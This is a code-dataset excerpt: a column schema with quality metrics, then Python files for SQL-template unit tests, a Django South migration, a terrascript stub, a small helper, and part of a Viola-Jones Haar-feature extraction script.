hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c718a453587f2523d16189c7363ca55c6bca7a18
| 2,931
|
py
|
Python
|
tests/fugue_sql/test_utils.py
|
gityow/fugue
|
e975625b33766d8b9dc64c6954871569b59367ec
|
[
"Apache-2.0"
] | null | null | null |
tests/fugue_sql/test_utils.py
|
gityow/fugue
|
e975625b33766d8b9dc64c6954871569b59367ec
|
[
"Apache-2.0"
] | null | null | null |
tests/fugue_sql/test_utils.py
|
gityow/fugue
|
e975625b33766d8b9dc64c6954871569b59367ec
|
[
"Apache-2.0"
] | null | null | null |
from fugue_sql._utils import fill_sql_template
def test_fill_sql_template():
data = {"a": 1, "b": "x"}
assert ( "select * from tbl where a = 1 and b = 'x'"
== fill_sql_template("select * from tbl where a = {{a}} and b = '{{b}}'", data)
)
assert ("""select * from tbl where a = 1 and b = "x" """
== fill_sql_template("""select * from tbl where a = {{a}} and b = "{{b}}" """, data)
)
assert ( """select * where b="%x" """
== fill_sql_template("""select * where b="%{{b}}" """, data))
assert ( """select * where b="x%" """
== fill_sql_template("""select * where b="{{b}}%" """, data))
assert ( """select * b like "{}%{}" """
== fill_sql_template("""select * b like "{}%{}" """, data))
assert ( """select * b like '%}' """
== fill_sql_template("""select * b like '%}' """, data))
assert ("""select * where b="%x" """
== fill_sql_template("""select * where b="%{{b}}" """, data)
)
assert ("""select * where b="x%" """
== fill_sql_template("""select * where b="{{b}}%" """, data)
)
assert "a=select " == fill_sql_template("a=select ", data)
# try single quotes for finding json patterns
assert "a=select * from b like '{%'" == fill_sql_template(
"a=select * from b like '{%'", data
)
assert "a=select * from b like '%}'" == fill_sql_template(
"a=select * from b like '%}'", data
)
# try double quotes for finding json patterns
assert 'a=select * from b like "%}"' == fill_sql_template(
'a=select * from b like "%}"', data
)
assert 'a=select * from b like "{%"' == fill_sql_template(
'a=select * from b like "{%"', data
)
assert "1x1" == fill_sql_template("{{a}}{{b}}{{a}}", data)
assert "" == fill_sql_template("", data)
assert "%s" == fill_sql_template("%s", data)
assert "%%s" == fill_sql_template("%%s", data)
assert "1%%sx1" == fill_sql_template("{{a}}%%s{{b}}{{a}}", data)
assert "1" == fill_sql_template("{{a}}", {"a": 1, "self": 2})
def test_fill_sql_template_array():
data = {"a": [0,1,2]}
assert (
"""select * from tbl where a in ('0','1','2')"""
== fill_sql_template(
"""select * from tbl where a in (
{%- for i in a -%}
{%- if loop.index0 < loop.length - 1 -%}'{{-i-}}',
{%- else -%}'{{-i-}}'
{%- endif -%}
{%- endfor -%}
)""", data)
)
def upper(word):
return word.upper()
data = {"a": ['a','b','c']}
assert (
"""select * from tbl where a in ('A','B','C')"""
== fill_sql_template(
"""select * from tbl where a in (
{%- for i in a -%}
{%- if loop.index0 < loop.length - 1 -%}'{{-i|upper-}}',
{%- else -%}'{{-i|upper-}}'
{%- endif -%}
{%- endfor -%}
)""", data)
)
| 34.892857
| 88
| 0.476629
| 364
| 2,931
| 3.692308
| 0.131868
| 0.125
| 0.267857
| 0.15625
| 0.790179
| 0.741071
| 0.741071
| 0.700893
| 0.700893
| 0.653274
| 0
| 0.009625
| 0.291027
| 2,931
| 83
| 89
| 35.313253
| 0.637151
| 0.029683
| 0
| 0.181818
| 0
| 0
| 0.342234
| 0
| 0
| 0
| 0
| 0
| 0.381818
| 1
| 0.054545
| false
| 0
| 0.018182
| 0.018182
| 0.090909
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c7273a3882be92bef3eeeeb2c24ebc57eaccd151
| 16,486
|
py
|
Python
|
emma/interface/migrations/0002_auto__add_field_contract_date_signed.py
|
djangowebstudio/emma
|
afbdaa5c02b4164687356755fddba307eb682ef4
|
[
"BSD-3-Clause"
] | null | null | null |
emma/interface/migrations/0002_auto__add_field_contract_date_signed.py
|
djangowebstudio/emma
|
afbdaa5c02b4164687356755fddba307eb682ef4
|
[
"BSD-3-Clause"
] | null | null | null |
emma/interface/migrations/0002_auto__add_field_contract_date_signed.py
|
djangowebstudio/emma
|
afbdaa5c02b4164687356755fddba307eb682ef4
|
[
"BSD-3-Clause"
] | null | null | null |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Contract.date_signed'
db.add_column('interface_contract', 'date_signed', self.gf('django.db.models.fields.DateField')(auto_now=True, default=datetime.date(2010, 6, 12), blank=True), keep_default=False)
def backwards(self, orm):
# Deleting field 'Contract.date_signed'
db.delete_column('interface_contract', 'date_signed')
models = {
'interface.album': {
'Meta': {'object_name': 'Album'},
'album_identifier': ('django.db.models.fields.CharField', [], {'max_length': '255', 'unique': 'True'}),
'album_name': ('django.db.models.fields.CharField', [], {'default': "'untitled album'", 'max_length': '255'}),
'album_pages': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'document': ('django.db.models.fields.files.FileField', [], {'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['interface.Image']"}),
'ts': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'interface.albumclass': {
'Meta': {'object_name': 'AlbumClass'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'ts': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'interface.author': {
'Meta': {'object_name': 'Author'},
'author': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['interface.Image']"}),
'notes': ('django.db.models.fields.TextField', [], {}),
'ts': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'interface.category': {
'Meta': {'object_name': 'Category'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['interface.Image']"}),
'image_LNID': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'image_cat': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'interface.contract': {
'Meta': {'object_name': 'Contract'},
'contract': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'date_signed': ('django.db.models.fields.DateField', [], {'auto_now': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'interface.copyright': {
'Meta': {'object_name': 'Copyright'},
'copyright': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'copyright_terms': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['interface.Image']"}),
'image_LNID': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'interface.favorite': {
'Meta': {'object_name': 'Favorite'},
'album_identifier': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'album_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['interface.Image']"}),
'image_LNID': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'notes': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'tag': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'ts': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'interface.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image_LNID': ('django.db.models.fields.CharField', [], {'max_length': '255', 'unique': 'True'}),
'image_group': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'image_pages': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'interface.image': {
'Meta': {'object_name': 'Image'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'date_entered': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'date_modified': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'group_status': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image_LNID': ('django.db.models.fields.CharField', [], {'max_length': '255', 'unique': 'True'}),
'image_category': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'image_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'image_pages': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'image_path': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'image_real_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'image_real_path': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'ts': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'interface.imagecount': {
'Meta': {'object_name': 'ImageCount'},
'count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'interface.keyword': {
'Meta': {'object_name': 'Keyword'},
'cright': ('django.db.models.fields.NullBooleanField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['interface.Image']"}),
'image_LNID': ('django.db.models.fields.CharField', [], {'max_length': '255', 'unique': 'True'}),
'image_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'image_path': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'keywords': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'notes': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'profile': ('django.db.models.fields.NullBooleanField', [], {'null': 'True'}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'subject': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'ts': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'interface.keywordcount': {
'Meta': {'object_name': 'KeywordCount'},
'count': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'keyword': ('django.db.models.fields.CharField', [], {'max_length': '255', 'unique': 'True'}),
'notes': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'ts': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'interface.mdall': {
'MDall': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'Meta': {'object_name': 'MDAll'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['interface.Image']"}),
'image_LNID': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'interface.metadata': {
'MDall': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'Meta': {'object_name': 'Metadata'},
'album': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'author': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'caption_writer': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'copyright': ('django.db.models.fields.NullBooleanField', [], {'null': 'True'}),
'country': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'creator': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'creator_tool': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'credit': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'datetimeoriginal': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'document': ('django.db.models.fields.files.FileField', [], {'max_length': '255', 'blank': 'True'}),
'documentname': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'file_type': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'headline': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['interface.Image']"}),
'image_LNID': ('django.db.models.fields.CharField', [], {'max_length': '255', 'unique': 'True'}),
'instructions': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'keyword': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['interface.Keyword']"}),
'keywords': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'mime_type': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'orientation': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'profile': ('django.db.models.fields.NullBooleanField', [], {'null': 'True'}),
'provincestate': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'softdate': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'subject': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'ts': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'interface.order': {
'Meta': {'object_name': 'Order'},
'album_identifier': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'client': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'clientImage': ('django.db.models.fields.CharField', [], {'max_length': '255', 'unique': 'True'}),
'group_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['interface.Image']"}),
'image_LNID': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'notes': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'resolution': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'status': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'}),
'ts': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'interface.query': {
'Meta': {'object_name': 'Query'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mode': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'query': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'ts': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'interface.user': {
'Meta': {'object_name': 'User'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.NullBooleanField', [], {'null': 'True'}),
'pagesize': ('django.db.models.fields.IntegerField', [], {'default': '8'}),
'search': ('django.db.models.fields.CharField', [], {'default': "'simple'", 'max_length': '255'}),
'setstr1': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'setstr2': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'setstr3': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'setstr4': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'setstr5': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'setting1': ('django.db.models.fields.NullBooleanField', [], {'null': 'True'}),
'setting10': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'setting2': ('django.db.models.fields.NullBooleanField', [], {'null': 'True'}),
'setting3': ('django.db.models.fields.NullBooleanField', [], {'null': 'True'}),
'setting4': ('django.db.models.fields.NullBooleanField', [], {'null': 'True'}),
'setting5': ('django.db.models.fields.NullBooleanField', [], {'null': 'True'}),
'setting6': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'setting7': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'setting8': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'setting9': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'ts': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.IntegerField', [], {'default': '0'})
}
}
complete_apps = ['interface']
| 73.928251
| 187
| 0.546828
| 1,636
| 16,486
| 5.413203
| 0.09291
| 0.134598
| 0.233966
| 0.334237
| 0.854788
| 0.836043
| 0.816622
| 0.73453
| 0.668699
| 0.569896
| 0
| 0.01671
| 0.201383
| 16,486
| 222
| 188
| 74.261261
| 0.655932
| 0.005399
| 0
| 0.304762
| 0
| 0
| 0.570121
| 0.330873
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009524
| false
| 0
| 0.019048
| 0
| 0.042857
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c748adc3a5216b0a946f8d2fecf39d7aa4d85ebb
| 374
|
py
|
Python
|
terrascript/data/fortios.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 507
|
2017-07-26T02:58:38.000Z
|
2022-01-21T12:35:13.000Z
|
terrascript/data/fortios.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 135
|
2017-07-20T12:01:59.000Z
|
2021-10-04T22:25:40.000Z
|
terrascript/data/fortios.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 81
|
2018-02-20T17:55:28.000Z
|
2022-01-31T07:08:40.000Z
|
# terrascript/data/fortios.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:16:41 UTC)
#
# For imports without namespace, e.g.
#
# >>> import terrascript.data.fortios
#
# instead of
#
# >>> import terrascript.data.fortinetdev.fortios
#
# This is only available for 'official' and 'partner' providers.
from terrascript.data.fortinetdev.fortios import *
| 24.933333
| 73
| 0.740642
| 49
| 374
| 5.653061
| 0.714286
| 0.216607
| 0.158845
| 0.238267
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.037152
| 0.136364
| 374
| 14
| 74
| 26.714286
| 0.820433
| 0.794118
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c74c235bf2f7afe95304b548ce8f9769a76dbd90
| 37
|
py
|
Python
|
purple/helpers.py
|
a8ksh4/purple
|
11460cc44cda7edf6f8fce5a5c841d4b04a47741
|
[
"MIT"
] | 3
|
2021-12-24T04:14:48.000Z
|
2022-01-19T16:48:14.000Z
|
purple/helpers.py
|
a8ksh4/purple
|
11460cc44cda7edf6f8fce5a5c841d4b04a47741
|
[
"MIT"
] | 1
|
2022-01-25T05:32:21.000Z
|
2022-01-25T05:32:21.000Z
|
purple/helpers.py
|
a8ksh4/purple
|
11460cc44cda7edf6f8fce5a5c841d4b04a47741
|
[
"MIT"
] | 1
|
2022-01-19T00:41:04.000Z
|
2022-01-19T00:41:04.000Z
|
def key(index):
return 1 << index
| 18.5
| 21
| 0.621622
| 6
| 37
| 3.833333
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035714
| 0.243243
| 37
| 2
| 21
| 18.5
| 0.785714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
c771313e108f7daf29caacf358449193feac0774
| 5,972
|
py
|
Python
|
utils.py
|
Avashist1998/Viola-Jones_Algorithm
|
0de21a22485b0f60fa03397ce6592dd2c7e0e3a5
|
[
"MIT"
] | null | null | null |
utils.py
|
Avashist1998/Viola-Jones_Algorithm
|
0de21a22485b0f60fa03397ce6592dd2c7e0e3a5
|
[
"MIT"
] | null | null | null |
utils.py
|
Avashist1998/Viola-Jones_Algorithm
|
0de21a22485b0f60fa03397ce6592dd2c7e0e3a5
|
[
"MIT"
] | null | null | null |
# The goal of the file to perform the feature extraction using the Haar_Features.
# I hoping to define the function in this file and worry about the rest later.
import cv2
import os
import glob
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import time
# Setting up a assigning the label to the images
# get the base path of the directory
def intergal_image(image):
[row,col] = image.shape
i_image = image.copy()
for i in range(0,row):
for j in range(0,col):
i_image[i,j] = sum(sum(image[0:i+1,0:j+1]))
return i_image
def feature_extraction(image):
image_copy = image.copy()
feature = []
[row, col] = image_copy.shape
# Type 1 features (two vertical)
for w in range(1,5):
for h in range(1,9):
for i in range(row-h+1):
for j in range(col-2*w+1):
output = -2*image_copy[i+h-1,j+w-1] + 2*image_copy[i,j+w-1] + image_copy[i+h-1,j+2*w-1] + image_copy[i+h-1,j] + image_copy[i,j+2*w-1] - image_copy[i,j]
feature.append(output)
print(len(feature))
#Type 2 features (two horizontal)
for h in range(1,5):
for w in range(1,9):
for i in range(row-2*h+1):
for j in range(col-w+1):
output = 2*image_copy[i+h-1,j] + image_copy[i+2*h-1,j+w-1] + image_copy[i,j+w-1] - 2*image_copy[i+h-1,j+w-1] - image_copy[i+2*h-1,j] - image_copy[i,j]
feature.append(output)
print(len(feature))
# Type 3 feature (three Horizonatal)
for h in range(1,3):
for w in range(1,9):
for i in range(row-4*h+1):
for j in range(col-w+1):
output = 2*image_copy[i+3*h-1,j+w-1] + 2*image_copy[i+h-1,j] - 2*image_copy[i+h-1,j+w-1] - 2*image_copy[i+3*h-1,j] - image_copy[i+4*h-1,j+w-1] + image_copy[i+4*h-1,j] - image_copy[i,j] + image_copy[i,j+w-1]
feature.append(output)
print(len(feature))
# Type 4 feature (two Vertical)
for h in range(1,9):
for w in range(1,3):
for i in range(row-h+1):
for j in range(col-4*w+1):
output = 2*image_copy[i,j+w-1] + 2*image_copy[i+h-1,j+3*w-1] - 2*image_copy[i,j+3*w-1] - 2*image_copy[i+h-1,j+w-1] - image_copy[i,j]+ image_copy[i+h-1,j] - image_copy[i+h-1,j+4*w-1] + image_copy[i,j+4*w-1]
feature.append(output)
print(len(feature))
# Type 5 feature (four)
for h in range(1,5):
for w in range(1,5):
for i in range(row-2*h+1):
for j in range(col-2*w+1):
output = image_copy[i,j]+ 4*image_copy[i+h-1,j+w-1] - 2*image_copy[i,j+w-1] - 2*image_copy[i+h-1,j] + image[i+2*h-1,j+2*w-1] - 2*image_copy[i+h-1,j+2*w-1] + image_copy[i,j+2*w-1] - 2*image_copy[i+2*h-1,j+w-1] + image_copy[i+2*h-1,j]
feature.append(output)
print(len(feature))
return feature
#---------------------------------------------------------------------------------------------------------------------
base_path = os.getcwd()
train_faces_files = glob.glob(base_path+ '/dataset/trainset/faces/*.png')
train_faces_files.sort()
train_non_faces_files = glob.glob(base_path+ '/dataset/trainset/non-faces/*.png')
